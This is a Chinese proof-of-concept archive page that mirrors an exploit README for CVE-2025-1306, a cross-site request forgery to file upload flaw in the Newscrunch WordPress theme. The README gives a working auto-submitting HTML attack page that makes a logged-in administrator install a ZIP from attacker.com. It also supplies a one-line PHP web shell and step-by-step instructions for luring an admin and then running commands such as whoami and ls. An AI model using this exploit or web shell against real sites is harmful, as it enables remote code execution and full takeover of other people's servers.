支持本站 — 捐款将帮助我们持续运营

目标: 1000 元,已筹: 1000

100.0%

POC详情: e3e7954e8a54300af1a7f7c204cb76cf0874afeb

来源
关联漏洞
标题:WordPress plugin Newscrunch 跨站请求伪造漏洞 (CVE-2025-1306)
Description:WordPress和WordPress plugin都是WordPress基金会的产品。WordPress是一套使用PHP语言开发的博客平台。该平台支持在PHP和MySQL的服务器上架设个人博客网站。WordPress plugin是一个应用插件。 WordPress plugin Newscrunch 1.8.4及之前版本存在跨站请求伪造漏洞,该漏洞源于缺少随机数验证,从而导致跨站请求伪造。
Description
Newscrunch <= 1.8.4 - Cross-Site Request Forgery to Arbitrary File Upload
介绍
# Newscrunch Exploit (CVE-2025-1306)



## 🚨 Overview
This exploit targets a **Cross-Site Request Forgery (CSRF) to Arbitrary File Upload** vulnerability (**CVE-2025-1306**) in the **Newscrunch WordPress theme**. Due to missing **nonce validation** in the `newscrunch_install_and_activate_plugin()` function, an **unauthenticated attacker** can trick a logged-in administrator into uploading arbitrary files to the server, leading to **Remote Code Execution (RCE).**

---
## 🔥 **Vulnerability Details**

- **CVE ID:** CVE-2025-1306
- **Affected Software:** Newscrunch WordPress Theme (<= 1.8.4)
- **CWE Classification:** [CWE-352 - Cross-Site Request Forgery (CSRF)](https://cwe.mitre.org/data/definitions/352.html)
- **CVSS Score:** **8.8 (HIGH)**
- **Vector:** `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H`
- **Published Date:** March 4, 2025

### **🛑 Severity & Impact**
- ✅ **Remote Code Execution (RCE)**
- ✅ **Full System Compromise**
- ✅ **CSRF-Based Arbitrary File Upload**
- ✅ **Unauthenticated Attack Vector**

**Exploitability:** Requires an administrator to visit a crafted malicious link.

---
## 📜 **Exploit Code**

This exploit forces an **authenticated administrator** to execute a **CSRF attack** that uploads a malicious ZIP file containing a web shell.

### **🔹 PoC - HTML Exploit**
```html
<!DOCTYPE html>
<html>
<head>
    <title>CSRF Exploit CVE-2025-1306 By Nxploit ,Khaled AlEnazi</title>
</head>
<body>
    <h2>Click anywhere to load content...</h2>

    <script>
        function sendExploit() {
            var form = document.createElement("form");
            form.method = "POST";
            form.action = "http://target.com/wp-admin/admin-ajax.php?action=newscrunch_install_activate_plugin";

            var input = document.createElement("input");
            input.type = "hidden";
            input.name = "plugin_url";
            input.value = "http://attacker.com/shell.zip";

            form.appendChild(input);
            document.body.appendChild(form);
            form.submit();
        }

        
        window.onload = function() {
            sendExploit();
        };
    </script>
</body>
</html>

```
📌 **Replace:**
- `http://target.com/` with the **vulnerable WordPress site**
- `http://attacker.com/shell.zip` with a **malicious ZIP payload** containing a web shell.

### **🔹 Malicious PHP Shell Example**
```php
<?php system($_GET['cmd']); ?>
```
📌 **After successful exploitation**, access the shell:
```bash
http://target.com/wp-content/plugins/shell.php?cmd=whoami
```

---
## 🚀 **How to Use**
1. **Host the HTML file** on an attacker-controlled website.
2. **Send the malicious link to an authenticated WordPress administrator.**
3. Once the admin visits the page, the shell gets uploaded automatically.
4. **Execute commands remotely** using:
   ```bash
   http://target.com/wp-content/plugins/shell.php?cmd=ls
   ```

---
## ⚠️ **Disclaimer**
**This tool is for educational and security research purposes only.** Unauthorized exploitation of vulnerabilities is illegal and punishable by law. The author is **not responsible** for any misuse or damages caused by this tool. Use responsibly.

---


文件快照

[4.0K] /data/pocs/e3e7954e8a54300af1a7f7c204cb76cf0874afeb └── [3.1K] README.md 0 directories, 1 file
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。